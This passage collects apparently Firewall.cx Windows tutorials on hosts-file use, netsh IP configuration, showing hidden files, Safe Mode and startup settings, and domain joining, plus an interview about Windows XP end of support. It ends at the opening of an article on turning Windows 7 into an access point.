The device queries the DNS server, usually configured by the local router, by requesting the server for the IP address of that specific remote domain name. In turn, the DNS server may have to query other similar servers on the Internet until it is able to locate the correct information for that domain name. The DNS server then returns the remote IP address to the device. Finally, the device opens a connection directly to the remote IP address to perform the necessary operations.

An Alternative Method – The 'Hosts' File

Querying the DNS server to connect to a remote device can be a time-consuming process. An alternative faster method is to look up the hosts file first. This is like the local address book in your mobile, which you can consult for quickly calling up commonly used telephone numbers. All operating systems use a hosts file to communicate via TCP/IP, which is the standard of communication on the Internet. In the hosts file, you can create a mapping between domain names and their corresponding IP addresses.

You can view the contents of the hosts file in a text editor. Typically, it contains IP addresses and corresponding domain names separated by at least one space, and each entry on its own line. By suitably manipulating the contents of the hosts file, it is very easy to interchange the IP address mappings of Google.com and Yahoo.com, such that when searching for Yahoo your browser will point to Google and vice versa!

Most operating systems, including Microsoft Windows, are configured to give preference to the hosts file over the DNS server queries. In fact, if your operating system finds a mapping for a domain name in its hosts file, it will use that IP address directly and not even bother to query the DNS server. Whatever entries you add to your hosts file, they start working immediately and automatically. You will not need to either reboot or enter any additional command to make the operating system start using the entries in the hosts file.

Understanding Domain Name Resolution On Windows

Windows machines may not always have a hosts file, but they will have a sample file named lmhosts.sam. You will find the hosts file and the lmhosts.sam file in the following location for all Windows operating systems, including Server editions:

C:\Windows\System32\drivers\etc\hosts

windows-hosts-file-usage-and-importance-1Figure 1. Hosts & lmhosts.sam files in File Explorer

In case the hosts file is missing, you can copy the lmhosts.sam file to a new file named hosts and use it as you wish after editing it in Notepad.

Getting The Most Out Of Your Hosts File

The Windows hosts file is a great help in testing new machines or deployment servers. You may want to set up and test online servers, but have them resolving only for your workstation. For example, your true web server may have a domain name www.firewall.cx, while you may have named your development server development.firewall.cx.

To connect to the development server from a remote location, you could change www.firewall.cx in your public DNS server to point to development.firewall.cx, or add an additional entry in the public DNS server. The problem with this method is that although you would be able to log into your development server, so would everyone else as the DNS server is publicly accessible.

So, instead of adding or changing resource records on your public DNS server, you can modify the hosts file on the computer that you will be using for connecting to the remote development server. Simply add an entry in the hosts file to map development.firewall.cx or even www.firewall.cx to the IP address of your development server. This will let your test bed computer connect to your development server without making the server publicly discoverable via DNS.
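As an illustration, assuming your development server sits on the hypothetical IP address 10.0.0.25, the hosts file entries would look similar to the following (one mapping per line, IP address first, domain name second):

10.0.0.25    development.firewall.cx
10.0.0.25    www.firewall.cx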

Another great usage of the hosts file is to block spyware and/or ad networks. Add all the spyware and ad network domain names to the Windows hosts file and map them to the IP address 127.0.0.1, which will always point back to your machine. That means your browser will be unable to reach these sites or domains. This has a dual benefit: unwanted content is blocked, and pages can load faster since requests to these domains never leave your machine.

You can download ready-made hosts files that list large numbers of known ad servers, banner sites, sites giving tracking cookies, sites with web bugs and infected sites. You can find such hosts files on the Hosts File Project. Before using one of these files in your computer, it would be advisable to backup the original file first. Although using the downloadable hosts files is highly recommended, one must keep in mind that large hosts files may slow down your system.

Usually, Windows runs a DNS Client service that caches previous DNS requests in memory. Although this is supposed to speed up the process, having to read a very large hosts file into the cache may cause the computer to slow down. You can easily fix this by stopping and disabling the DNS Client service from the Services console under Administrative Tools.
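The same can be done from an elevated command prompt. The commands below are a sketch that applies to Windows 7; newer Windows releases protect the DNS Client service and may refuse to stop or disable it:

C:\Windows\system32> net stop dnscache

C:\Windows\system32> sc config dnscache start= disabled

To restore the default behaviour, set the start type back with sc config dnscache start= auto and then run net start dnscache.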

Conclusion

The Windows hosts file can be found on all Windows operating systems, including server editions. If used with care, the Windows hosts file can be a powerful tool. It can make your computer environment much safer by helping to block malicious websites, and at the same time potentially increase your browser speed.

 

  • Hits: 20283

How To Change & Configure An IP Address or Set to DHCP, Using The Command Prompt In Windows 7

Not many users are aware that Windows 7 provides more than one way to configure a workstation’s network adaptor IP address or force it to obtain an IP address from a DHCP server. While the most popular method is configuring the properties of your network adaptor via the Network and Sharing Center, the less popular way, unknown to most users, is using the netsh command from the Command Prompt. In this tutorial, we show you how to use the netsh command to quickly and easily configure your IP address or set it to DHCP. Competent users can also create simple batch files (.bat) for each network (e.g. home, work etc.) so they can execute them to quickly make the IP address, Gateway IP and DNS changes (an example batch file is provided near the end of this article).

In order to successfully change the IP address via Command Prompt, Windows 7 requires the user to have administrative rights. This means even if you are not the administrator, you must know the administrative password, since you will be required to use the administrative command prompt.

Opening The Administrative Command Prompt On Windows 7

To open the administrative command prompt in Windows 7, first click on the Start icon. In the search dialog box that appears, type cmd and right-click on the cmd search result displayed. On the menu that Windows brings up, click on the Run as administrator option as shown in the below screenshot:

windows-7-change-ip-address-via-cmd-prompt-1Figure 1. Running CMD as Administrator

Depending on your User Account Control Settings (UAC), Windows may ask for confirmation. If this happens, simply click on Yes and Windows will present the CLI prompt running in elevated administrator privileged mode:

windows-7-change-ip-address-via-cmd-prompt-2Figure 2.  The Administrative Command Prompt Windows 7

Using The ‘netsh’ Command Prompt To Change The IP Address, Gateway IP & DNS

At the Administrative Command Prompt, type netsh interface ip show config, which will display the network adapters available on your system and their names. Note down the name of the network adaptor for which you would like to set the static IP address.

windows-7-change-ip-address-via-cmd-prompt-3Figure 3.  Finding Our Network Adapter ID

In our example, we’ll be modifying the IP address of the interface named Wireless Network Connection, which is our laptop’s wireless network card.

Even if the Wireless Network Connection is set to be configured via DHCP, we can still configure a static IP address. Following is the command used to configure the interface with the IP address of 192.168.5.50 with a subnet mask of 255.255.255.0 and finally a Gateway of 192.168.5.1:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1

Next, we configure our primary DNS server using the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8

Note: When entering a DNS server, Windows will try to query the DNS server to validate it. If for any reason the DNS server is not reachable (therefore not validated), you might see the following error:

The configured DNS server is incorrect or does not exist

To configure the DNS server without requiring DNS Validation, use the validate=no parameter at the end of the command:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

This command forces the DNS server setting without any validation and therefore no error will be presented at the CLI output in case the DNS server is not reachable.

To verify our new settings, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

At this point, we should see the network settings we configured, as shown below:

windows-7-change-ip-address-via-cmd-prompt-4Figure 4. Verifying Our New Network Settings

Using The 'netsh' Command Prompt To Set The Network Interface Card To DHCP

You can also use the netsh command to switch your network adaptor from a static IP configuration back to DHCP, using the following command:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" dhcp

Windows will not return any confirmation after the command is entered; however, if the network adaptor has successfully obtained an IP address and has an Internet connection, there should not be any network icon with an exclamation mark in the taskbar notification area, as shown below:

windows-7-change-ip-address-via-cmd-prompt-5Figure 5.  Wireless Icon with no Exclamation Mark

Finally, to verify that DHCP is enabled and we've obtained an IP address, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config
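As mentioned at the beginning of this article, these commands lend themselves nicely to batch files. The two sketches below assume the adaptor is still named Wireless Network Connection and reuse the example addressing from this tutorial; adjust the names and addresses to match your own networks and remember to run the batch files as administrator:

rem work.bat - apply static IP settings for the office network
netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1
netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

rem home.bat - return the adaptor to DHCP for both IP address and DNS
netsh interface ip set address "Wireless Network Connection" dhcp
netsh interface ip set dnsserver "Wireless Network Connection" dhcp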

This article showed how to configure a Windows 7 network interface with an IP address, Gateway and DNS server, using the Administrative Command Prompt. We also showed how to set a Windows 7 network interface to obtain an IP address automatically from a DHCP server.



  • Hits: 180963

How to View Hidden Files and Folders In Windows 8 & 8.1

Windows 8 & 8.1 hide two types of files so that normally you do not see them while exploring your computer. The first type is files or folders with their 'H' attribute set to make them hidden. The other type is Windows system files. The reason behind hiding these files is that users could inadvertently tamper with them or even delete them, causing the operation of Windows 8/8.1 to fail. This article explains how you can configure Windows 8 or 8.1 to show all hidden files and folders, plus show Windows system files.

You can change the behavior of your Windows 8/8.1 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Both are analysed below:

Windows 7 users can also refer to our How to View Hidden Files and Folders In Windows 7 article

Method 1: Making Hidden & System Files Visible From Windows Explorer

Begin from the Start Screen by closing down all open applications.

Step 1: Tap/click on the Desktop tile to bring up the Windows Desktop.

Step 2: Tap/click on the Files Explorer icon in the Panel at the bottom left hand side of your Desktop:

windows-8-how-to-show-hidden-folders-files-1Figure 1. Icons in the Windows Panel

When the Explorer window opens, expand the Ribbon by pressing the keys Ctrl+F1 together, or by tapping/clicking on the Down-Arrow at the top right hand corner of the window panel. Next, tap/click on the View tab and then on the Local Disk (C:) option. Tap/click on Large Icons option in the ribbon to see the folders.

Within the ribbon, if you tap/click to place a check mark in the checkbox against the Hidden items option, all hidden folders and files will become visible and will show up with semi-transparent icons:

windows-8-how-to-show-hidden-folders-files-2Figure 2. File Explorer showing hidden folders and files

Method 2: Making Hidden & System Files Visible From The Folder Options

Starting from any screen, swipe in from the right hand edge or tap/click on the bottom right hand corner of the screen to bring up the Charms:

windows-8-how-to-show-hidden-folders-files-3Figure 3. Windows Charms

Tap/click on the Search icon and type “Control” within the resulting dialog box. Within the search results displayed, you will find Control Panel; tap/click on this to bring up the Control Panel:

windows-8-how-to-show-hidden-folders-files-4Figure 4. Control Panel

Tap/click on the Appearance and Personalization link, which will open up the Appearance and Personalization screen.

Next, Tap/click on the Folder Options link or the Show hidden files and folders link to bring up the Folders Option screen:

windows-8-how-to-show-hidden-folders-files-5Figure 5. Control Panel - Folder Options

Another way to reach the Folder Options is from File Explorer. In the View tab, tap/click on Options (ribbon expanded) to get a link for Change folder and search options. Tap/click on the Change folder and search options link to open up the Folder Options window.

Click on either Folder Options or Show hidden files and folders to reach the Folder Options screen as shown below:

windows-8-how-to-show-hidden-folders-files-6 Figure 6. Folder Options Screen

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible hidden and system files and folders and make them visible.

It is important to see the file extension to know a file type - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and remove the checkmark against it.

As mentioned in the beginning of our article, Windows hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

To make the changes effective, click on the Apply button and subsequently on the OK button. All screens will close and you will be back to your Desktop.

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 8/8.1 to show hidden files and folders, follow the reverse procedure above in the Folder Options screen.
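As a side note, you can also list hidden items from the command prompt without changing any Explorer settings. The example below lists the hidden entries in the root of the C: drive; substitute any folder of interest:

C:\> dir C:\ /a:h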

  • Hits: 52956

How to View Hidden Files & Folders in Windows 7

This article shows you how to see hidden files and folders in Windows 7. Windows 7 hides important system files so that normally, you do not see them while exploring your computer.

The reason behind hiding these files is that users could inadvertently tamper with them or even delete them, causing Windows 7 operations to falter. However, malicious software programs take advantage of this feature to create hidden files or folders and cause disruptions in the computer's operations without the user being able to detect them.

Therefore, being able to see hidden files or folders has its advantages and helps in repairing damages caused by unwanted hidden files. You can change the behavior of your Windows 7 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Start by closing down all open applications.

Windows 8 and 8.1 users can also refer to our How to View Hidden Files and Folders In Windows 8 & 8.1 article

Method 1: Reaching The Folder Options Screen From Windows Explorer

Click on the Windows Explorer icon in the TaskBar at the bottom left hand side of your Desktop:

windows-7-showing-hidden-files-2Figure 1. Icons in the Windows Panel

When the Explorer window opens, you have to click on the Organize button to display a drop down menu:

windows-7-showing-hidden-files-3Figure 2. Organize Menu

Next, Click on the Folder and Search options and the Folder Options screen opens up:

windows-7-showing-hidden-files-6Figure 3. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is also important to be able to see file extensions in order to know a file's type - normally, Windows keeps these hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show the extensions of all files.

When ready, click on the Apply and OK button to save the changes.

Method 2: Reaching The Folder Options Screen From The Control Panel

Click on the Start icon in the Panel at the bottom left hand side of your Desktop – see figure 4 below. In the resulting Start menu, you must click on the Control Panel option.

windows-7-showing-hidden-files-4Figure 4. Start Menu

This opens up the Control Panel screen, which allows you to control your computer's settings. Click on the Appearance and Personalization link to open up the Appearance and Personalization screen.

windows-7-showing-hidden-files-5Figure 5. Appearance and Personalization screen

Click on either Folder Options or Show hidden files and folders on the left window, to reach the Folder Options screen.

There are other ways as well to reach the Folder Options screen.

windows-7-showing-hidden-files-6Figure 6. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is also important to be able to see file extensions in order to know a file's type - normally, Windows keeps these hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show the extensions of all files.

Windows also hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

When ready, click on the Apply and OK button to save the changes.

Windows Now Shows Hidden Files & Folders

When we next browse through C: Drive, we'll notice that there are now additional folders and files which were previously hidden:

windows-7-showing-hidden-files-7Figure 7. C: Drive showing hidden folders

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 7 to show hidden files and folders, follow the reverse procedure executed in the Folder Options screen.
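It is also worth knowing that the hidden attribute of an individual file or folder can be inspected or cleared from the command prompt using the attrib command. The path below is purely a hypothetical example:

C:\> attrib "C:\SomeFolder\SomeFile.txt"

C:\> attrib -h "C:\SomeFolder\SomeFile.txt"

The first command displays the file's current attributes (an H indicates hidden), while the second removes the hidden attribute.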

  • Hits: 65436

How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode

This article will show you how to start Windows 8 and Windows 8.1 in Safe Mode and how to enable F8 Safe Mode. Users of previous Windows operating systems will recall that by pressing and holding the F8 key while Windows is booting (before the Windows logo appears), the system presents a special menu that allows the user to boot the operating system into Safe Mode.

When Windows boots, the Safe Mode logo appears on all four corners of the screen:

windows-8-enable-f8-safe-mode-1Figure 1. Windows 8/8.1 in Safe Mode

Occasionally, Windows will not allow you to delete a file or uninstall a program. This may be due to several reasons, one of which can be a virus, a malware infection or a driver/application compatibility issue. Windows may also face hardware driver problems that you are unable to diagnose in the normal process. Traditionally, Windows provides a Safe Mode to handle such situations. When in Safe Mode, only the most basic drivers and programs that allow Windows to start are loaded.

Unlike all other Windows operating systems, Windows 8 and 8.1 do not allow entering Safe Mode via the F8 key by default. If you are unable to boot into Windows 8 or 8.1 after several attempts, the operating system automatically loads the Advanced Startup Options that allow you to access Safe Mode.

For users who need to force their system to boot into Safe Mode, there are two methods to enter the Advanced Startup Settings that will allow Windows to boot into Safe Mode.

Method 1 - Accessing Safe Mode In Windows 8 / Windows 8.1

Accessing Safe Mode involves a number of steps and actions required by the user. These are covered in great depth in our How to Enable & Use Windows 8 Startup Settings Boot Menu article.

Method 2 - Enabling Windows Safe Mode Using F8 Key At Boot Time

If you find accessing Windows 8 Safe Mode too long and complex, you can alternatively enable the F8 key for booting into Safe Mode, just as it happens with the older Windows operating systems. This of course comes at the expense of slower booting since the operating system won't boot directly into normal mode.

Interestingly enough, users who choose to enable F8, can also access the diagnostic tools within the Safe Mode quickly at any time. Additionally, if you have multiple operating systems on your computer, enabling the F8 option makes it easier to select the required operating system when you start your computer.

Enabling the F8 key in Windows 8/8.1 is only possible with administrative permissions. For this, you will need to open an elevated command prompt. The easiest way to open the elevated command prompt window is by using the Windows and X key combination on your keyboard:

windows-8-enable-f8-safe-mode-2Figure 2. Windows Key +X

The Windows Key + X combination opens up the Power User Tasks Menu from which you can tap/click the Command Prompt (Admin) option:

windows-8-enable-f8-safe-mode-3Figure 3. Power User Tasks Menu

Should you receive a prompt from the User Account Control (UAC) requesting confirmation, simply allow the action and the command prompt should appear.

At the command prompt type in the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy legacy

windows-8-enable-f8-safe-mode-4 Figure 4. Administrative Command Prompt - Enable F8 Boot Function

On successful execution, Windows will acknowledge - The operation completed successfully.

Now, to enable the changes to take effect, you must reboot Windows. If you press the F8 key during Windows boot, you should be able to access Safe Mode and all other Advanced Boot Options.

If for any reason, you want to disable the F8 option, open the Administrative Command Prompt, enter the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy standard

 windows-8-enable-f8-safe-mode-5Figure 5. Administrative Command Prompt - Disable F8 Boot Function

Again, Windows will acknowledge - The operation completed successfully. The changes will take place on the next reboot and the F8 key will no longer boot Windows into Safe Mode.
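If you are unsure which boot menu policy is currently active, you can query the default boot entry at any time. The exact output layout varies slightly between builds, but the bootmenupolicy value (Legacy or Standard) will be listed:

C:\Windows\System32> bcdedit /enum {default}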

This article explained how to successfully start Windows 8 and Windows 8.1 in Safe Mode. We also saw how to enable the F8 Safe Mode function, which is disabled by default.

Visit our Windows 8/8.1 section to read more hot topics on the Windows 8 operating system.

 

  • Hits: 54307

How to Enable & Use Windows 8 Startup Settings Boot Menu (Workstations, Tablet & Touch Devices)

The Windows 8 Startup Settings Boot Menu allows users to change the way Windows 8 starts up. This provides users with the ability to enable Safe Mode with or without Command Prompt, Enable Boot Logging, Enable Debugging and much more. Access to the Startup Settings Boot Menu is provided through the Advanced Startup Options Menu as described in detail below. Alternatively, users can use the following command in the Run prompt to restart and boot directly into the Advanced Startup Options Menu:

shutdown /r /o /t 0

While not enabled by default, users can use the F8 key to enter Safe Mode when booting into the operating system, just as all previous Windows versions. To learn more on this, read our How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode article.

Enabling the Windows 8 Startup Settings Boot Menu via GUI

Start with the Windows 8 Start screen. Type the word advanced directly, which will bring up the items you can search. You may also slide in from the right edge, tap/click on the Search icon and type advanced into the resulting dialog box. Within the Search items listed, tap/click on Settings:

windows8-startup-settings-boot-menu-1Figure 1. Search Settings

 Windows will now show you the Advanced Startup Options within a dialog box as shown below:

windows8-startup-settings-boot-menu-2Figure 2. Advanced Settings Search Result

 Tapping or clicking within the dialog box will take you to the PC Settings screen. Tap/click on the General Button and scroll down the menu on the right hand side until you come to Advanced Startup. Directly underneath is the Restart Now button:

windows8-startup-settings-boot-menu-3Figure 3. PC Settings

 Tapping/clicking on the Restart Now button will let Windows offer its Options screen:

windows8-startup-settings-boot-menu-4Figure 4. Choose Options

 On the Options screen, tap/click on the Troubleshoot button to bring up the Troubleshoot menu:

windows8-startup-settings-boot-menu-5Figure 5. Troubleshoot Menu

 From here tap/click on the Advanced Options button to get to the Advanced Options menu:

windows8-startup-settings-boot-menu-6Figure 6. Advanced Options Menu

From the Advanced Options Menu, tap/click on the Startup Settings button. This brings you to the Startup Settings screen showing the various startup settings of Windows 8 that you will be able to change when you Restart. To move ahead, tap/click on the Restart button on the lower right corner of the screen:

windows8-startup-settings-boot-menu-7Figure 7. Startup Settings Screen

 Windows 8 will now reboot, taking you directly into the Startup Settings Boot Menu. Your mouse pointer will not work here and you must type the number key (or the function key) corresponding to your selection. If you wish to see more options, you can do so by pressing the F10 key:

windows8-startup-settings-boot-menu-8Figure 8. Startup Settings Boot Menu

To return without making any changes, hit the Enter key on your keyboard; you will need to login once again.

The menu options presented are analysed in detail below.

Windows 8 Startup Settings Boot Menu

The Windows 8 Startup Settings Boot Menu lists all the options from which you can select one to alter the way Windows will boot up next. You must be careful here, as there is no way you can go back on your selection and Windows will directly proceed to boot with the selected option. Each option results in a different functionality, as discussed below:

  • Enable Debugging – Useful only if you have a kernel debugger connected to your computer and you want it to control system execution. This option is usually used by advanced Windows users.
  • Enable boot logging – Useful if you want to know what is happening during boot time. This option forces Windows to create a log file at the following path: C:\Windows\Ntbtlog.txt, where you will find detailed information about the boot process. For example, if there is a problem with the starting of a specific driver, you will find the relevant information in the log file. Used normally by intermediate to advanced users.
  • Enable low-resolution video – Useful if you are facing trouble with your video graphics card and you are unable to see Windows properly. This option will let Windows start up in a low-resolution mode, from where you can specify the proper video resolution that Windows can use.
  • Enable Safe Mode – Useful if you want Windows to bypass the normal video card driver and use the generic VGA.sys driver instead. With this option, Windows will start up in a bare-bones mode and will load only those programs that are strictly necessary for it to work. Network support is disabled in this mode, so do not expect to connect to the Internet or local network.
  • Enable Safe Mode with Networking – This mode offers similar abilities as the previous Enable Safe Mode (Option 4) and provides additional network support, allowing connectivity to the local network or Internet.
  • Enable Safe Mode with Command Prompt – Useful when you want Windows online but with only a command prompt to type in commands, rather than the usual Windows GUI desktop. In this mode, Windows will only load the bare necessary programs to allow it to run. In place of the normal video card driver, Windows will operate the VGA.sys driver. However, do not confuse this mode with the Windows 8 Recovery Environment Command Prompt, where Windows operates offline.
  • Disable driver signature enforcement – Useful for loading unsigned drivers requiring kernel privileges. Typically, Windows does not allow drivers requiring kernel privileges to load unless it can verify the digital signature of the company that developed the driver. This option must be used very carefully, as you are setting aside the security reasons that normally would prevent malware drivers from sneaking in into your computer.
  • Disable early launch anti-malware protection – Useful to prevent driver conflicts that are preventing Windows from starting. A new feature in Windows 8 allows a certified anti-virus to load its drivers before Windows can load any other third-party driver. Therefore, the anti-virus software is available to scan all drivers before they are loaded. If the anti-virus program detects any malware, it blocks that driver. Since this is a great security feature, disable it only when necessary and apply extreme caution.
  • Disable automatic restart after failure – Useful when you want to see the crash information because Windows restarts too quickly after a crash making it impossible to read the information. Usually, after a crash, Windows displays an error message before automatically rebooting. You may not be able to read the information displayed if Windows reboots very quickly. This option prevents Windows from rebooting after a crash, allowing you to read the error message and take appropriate action.
  • Launch Recovery Environment – Useful for accessing recovery and diagnostic tools. This option is available when you press F10 in the Startup Settings Boot Menu. These options are available under Advanced Options Menu - see Figure 6.

This article covered how to enable and use the Startup Settings Boot Menu in Windows 8 and also explained each of the menu's startup options in detail. Readers interested in learning how to enable F8 Safe Mode functionality can read the article by clicking here.

  • Hits: 41237

How to Join a Windows 8, 8.1 Client to Windows Domain - Active Directory

In this article, we will show how to add a Windows 8 or Windows 8.1 client to a Windows Domain / Active Directory. The article can be considered an extension to our Windows 2012 Server article covering Active Directory & Domain Controller installation.

Our client workstation, FW-CL1, needs to join the Firewall.local domain. FW-CL1 is already installed with the Windows 8.1 operating system and configured with an IP address of 192.168.1.10 and a DNS server set to 192.168.1.1, which is the domain controller. It is important that any workstation needing to join a Domain has its DNS server configured with the Domain Controller's IP address to ensure proper DNS resolution of the Domain:

windows-8-join-active-directory-1Figure 1. FW-CL1 IPconfig

Now, to add the workstation to the domain, open the System Properties of FW-CL1 by right-clicking in the This PC icon and selecting properties:

windows-8-join-active-directory-2Figure 2. System Settings

Next, click Advanced system settings option in the upper left corner. The System Properties dialog box will open. Select the Computer Name tab and then click on the Change… button to add this computer to the domain.

windows-8-join-active-directory-3Figure 3. System Properties

In the next window, select the Domain: option under the Member of section and type the company's domain name. In our lab, the domain name is set to firewall.local. When done, click on the OK button.

windows-8-join-active-directory-4Figure 4. Adding PC to Domain

The next step involves entering the details of a domain account that has permission to join the domain. This security measure ensures no one can easily join the domain without the necessary authority. Enter the domain credentials and click OK:

windows-8-join-active-directory-5Figure 5. Enter Domain Credentials

If the correct credentials were inserted, the PC becomes a member of the domain. A little welcome message will be displayed. Click OK and Restart the PC to complete the joining process:

windows-8-join-active-directory-6Figure 6. Member of Domain

The detailed operations that occur during a domain join can be found in the %systemroot%\debug\NETSETUP.LOG file.

At a higher level, when you join a computer in Active Directory, a Computer Account is created in the Active Directory database and is used to authenticate the computer to the domain controller every time it boots up.
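For administrators who prefer to script the join, a similar result can be achieved from an elevated command prompt with the netdom utility. The sketch below is an alternative to the GUI method described above; it assumes the Remote Server Administration Tools (which provide netdom.exe) are installed on the client and uses hypothetical credentials that have permission to join the domain:

C:\> netdom join FW-CL1 /domain:firewall.local /UserD:firewall\administrator /PasswordD:* /REBoot:10

The asterisk causes netdom to prompt for the password instead of placing it on the command line, and /REBoot restarts the workstation shortly afterwards to complete the join.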

 This completes our discussion on how to join a Windows 8 & Windows 8.1 Client to Windows Domain - Active Directory.

  • Hits: 83231

Microsoft Windows XP - End of Life / End of Support

A Q&A with Cristian Florian, Product Manager For GFI LanGuard On Security Implications & Planning Ahead

windows-xp-eosWith Windows XP End of Life & End of Support just around the corner (8th of April 2014), companies around the globe are trying to understand what the implications will be for their business continuity and daily operations, while IT Managers and Administrators (not all) are preparing to deal with the impact on users, applications and systems.

At the same time, Microsoft is actively encouraging businesses to migrate to their latest desktop operating system, Windows 8.

 

One could say it’s a strategy game well played on Microsoft’s behalf, bound to produce millions of dollars in revenue, but where does this leave companies who are requested to make the hard choice and migrate their users to newer operating systems?

Do companies really need to rush and upgrade to Windows 7 or 8/8.1 before the deadline? Or do we need to simply step back for a moment and take things slowly in order to avoid mistakes that could cost our companies thousands or millions of dollars?

Parallel to the above thoughts, you might find yourself asking if software companies will continue to deliver support and security patches for their products; a question that might be of greater significance for many companies.

To help provide some clear answers to the above, but also understand how companies are truly dealing with the Windows XP End of Life, Firewall.cx approached GFI’s LanGuard product manager, Cristian Florian, to ask some very interesting questions that will help us uncover what exactly is happening in the background… We are certain readers will find this interview extremely interesting and revealing….

Interview Questions

Hello Cristian and thank you for accepting Firewall.cx’s invitation to help demystify the implications of Windows XP End of Life and its true impact to companies around the globe.

Response:

Thank you. Windows XP’s End of Life is a huge event and could have a significant security impact this year. So it will be important for companies to know what the risks are and how to mitigate them.

 

Question 1
Is Microsoft the only company dropping support for Windows XP? Taking in consideration Windows XP still holds over 29% of the global market share for desktop operating systems (Source Wikipedia https://en.wikipedia.org/wiki/Usage_share_of_operating_systems Feb. 2014), how are software companies likely to respond? Are they likely to follow Microsoft’s tactic?
 
Response:
A good number of companies have committed to support Windows XP beyond Microsoft’s End of Life date, but eventually they will have to drop support too. Although still high, the market share for Windows XP is showing a constant decline and once the deadline is reached, it will not take long before companies realize that it is no longer viable to dedicate resources to support and retain compatibility with Windows XP.

Google said that Chrome support for Windows XP will continue until April 2015. Adobe, however, will release the last version of Adobe Reader and Acrobat that still supports Windows XP in May 2014.

Microsoft will continue to provide antimalware definition updates for Windows XP until July 2015, and all major antivirus vendors will continue to support Windows XP for a period of time. Some of them have stated that they will support it until 2017 or 2018. Antivirus support is important for XP but one note of caution is that antivirus alone does not offer full protection for an operating system. So while supporting Windows XP is commendable, vendors need to be careful that they do not offer a false sense of security that could backfire on them and hurt their reputation.

 

Question 2
GFI is a leader in Network Security Software, automating patching and vulnerability assessments for desktop & server operating systems. We would like to know how GFI will respond to Windows XP End of Life.
 
Response:
We are telling our customers and prospects that Windows XP will not be a safe operating system after April 8. As of this year, Windows XP systems now show up in GFI LanGuard’s dashboard as high security vulnerabilities for the network during vulnerability assessments.

We will continue to provide patch management support for Windows XP. For as long as customers use XP and vendors release updates compatible with the OS, we will do what we can to keep those systems updated and as secure as possible. What is important to note is that this is simply not enough. The necessary security updates for the operating system will no longer be available and these are crucial for the overall security of the system and the network.

A GFI LanGuard trial offers unlimited network discovery and it can be used to track free of charge all Windows XP systems on the network. IT admins can use these reports to create a migration plan to a different operating system.

 

Question 3
Do IT Managers and Administrators really need to worry about security updates for their Windows XP operating system? Is there any alternative way to effectively protect their Windows XP operating systems?
 
Response:
If they have Windows XP systems, they should definitely be concerned.

In 2013 and the first quarter of 2014, Microsoft released 59 security bulletins for Windows XP; 31 of which are rated as critical. The National Vulnerability Database had reported 88 vulnerabilities for Windows XP in 2013, 47 of them, critical. A similar number of vulnerabilities is expected to be identified after April 8, but this time round, no patches will be available.

Part of the problem is due to the popularity of Windows XP. Because it is used so widely, it is a viable target for malware producers. It is highly probable that a number of exploits and known vulnerabilities have not been disclosed and will only be used after April 8 – when they know there won’t be any patch coming out of Microsoft.

There are only two options: either upgrade or retire the systems altogether. If they cannot be retired, they should be kept offline.

 
Question 4
What do you believe will be the biggest problem for those who choose to stay with Windows XP?
 
Response:
There are three problems that arise if these systems are still connected to the Internet. First, each system on its own will be a target and can be attacked quite easily. Second, and this is of greater concern, machines running XP will be used as gateways into the entire network. They are now the weakest link in the chain and can be hijacked to spread spam and malware, and act as a conduit for DDoS attacks.

Third, compliance. Companies that are using operating systems not supported by the manufacturer are no longer compliant with security regulations such as PCI DSS, HIPAA, PSN CoCo and others. They can face legal action and worse if the network is breached.

 

Question 5
GFI is well known in the IT Market for its security products and solutions. Your products are installed and trusted by hundreds and thousands of companies. Can you share with us what percentage of your customer database still runs the Windows XP operating system, even though we’ve got less than a month before its End of Life?
 
Response:
We have seen a marked decline in the number of XP users among our customers. A year ago, we were seeing up to 51% of machines using XP, with 41% having at least one XP system. Looking at the data this year, 17% are still using XP, with 36% having at least one Window XP system.

 

  • Hits: 19857

Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

Not many people are aware that Windows 7 has built-in capabilities that allow it to be transformed into a perfectly working access point so that wireless clients such as laptops, smartphones and others can connect to the local network or obtain Internet access. Turning a Windows 7 system into an access point is an extremely useful feature, especially when there is the need to connect other wireless devices to the Internet with no access point available.

When Windows 7 is configured to provide access point services, the operating system is fully functional and all system resources continue to be available to the user working on the system. In addition, the wireless network is encrypted using the WPA2 encryption algorithm.

